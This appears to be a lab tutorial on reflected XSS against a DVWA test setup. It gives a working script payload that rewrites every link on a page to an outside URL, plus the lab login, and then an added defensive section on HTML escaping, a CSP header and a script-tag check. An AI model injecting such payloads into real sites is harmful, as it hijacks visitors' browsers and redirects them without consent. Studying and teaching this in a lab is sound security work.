XX attack - reflected XSS attack hijacking the user's browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflected XSS attack that jumps to the vulnerable page. This could also be done directly in DVWA, but we constructed a relatively complex environment for demonstration purposes.
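```html
<script>
// Run once the page has finished loading
window.onload = function() {
  // Collect every <a> element on the page
  var link = document.getElementsByTagName("a");
  // Replace the target of each link with the replacement URL
  for (var j = 0; j < link.length; j++) {
    link[j].href = "http://www.baidu.com";
  }
}
</script>
```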
JavaScript code analysis: window.onload runs the anonymous function once the web page has finished loading.
What the function does: document.getElementsByTagName gets all of the a tags and stores them in the link array; a for loop then replaces every element in the array with the malicious URL.
Open the Chrome browser and test the effect in the reflected XSS page.
Log in at http://192.168.98.66/DVWA-master/login.php with user name admin and password password, then change the security level to low.
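The following is an added example, not part of the original post: it shows why the script above executes when a page reflects a request parameter unchanged, and how output encoding plus a Content-Security-Policy header makes the same input inert. The names `renderGreetingVulnerable`, `renderGreetingHardened`, `escapeHtml`, `securityHeaders` and `containsScriptTag` are hypothetical, and the `<pre>Hello ...</pre>` template is an assumed stand-in for the page that reflects the parameter.

```javascript
// Added example (not from the original post). All function names are
// hypothetical; the <pre>Hello ...</pre> template is an assumed stand-in
// for a server-side page that reflects a query parameter.

// The script from the post, as it would arrive in a request parameter.
const payload =
  '<script>window.onload = function() {' +
  'var link=document.getElementsByTagName("a");' +
  'for(var j = 0; j < link.length; j++) {' +
  'link[j].href="http://www.baidu.com";}}</script>';

// Vulnerable pattern: the parameter is concatenated into the HTML unchanged,
// so the browser parses it as markup and runs the script.
function renderGreetingVulnerable(name) {
  return '<pre>Hello ' + name + '</pre>';
}

// Output encoding for an HTML text context: every character that can open
// a tag, an entity or an attribute value is replaced by its entity.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: the same template, but the parameter is encoded first,
// so the browser displays the payload as text instead of executing it.
function renderGreetingHardened(name) {
  return '<pre>Hello ' + escapeHtml(name) + '</pre>';
}

// Defense in depth: a policy without 'unsafe-inline' makes the browser
// refuse inline <script> blocks even if an encoding step is missed.
function securityHeaders() {
  return { 'Content-Security-Policy': "default-src 'self'; script-src 'self'" };
}

// Simple check used to compare the two outputs: is a script tag present?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable output has <script>:',
  containsScriptTag(renderGreetingVulnerable(payload)));
console.log('hardened output has <script>:',
  containsScriptTag(renderGreetingHardened(payload)));
```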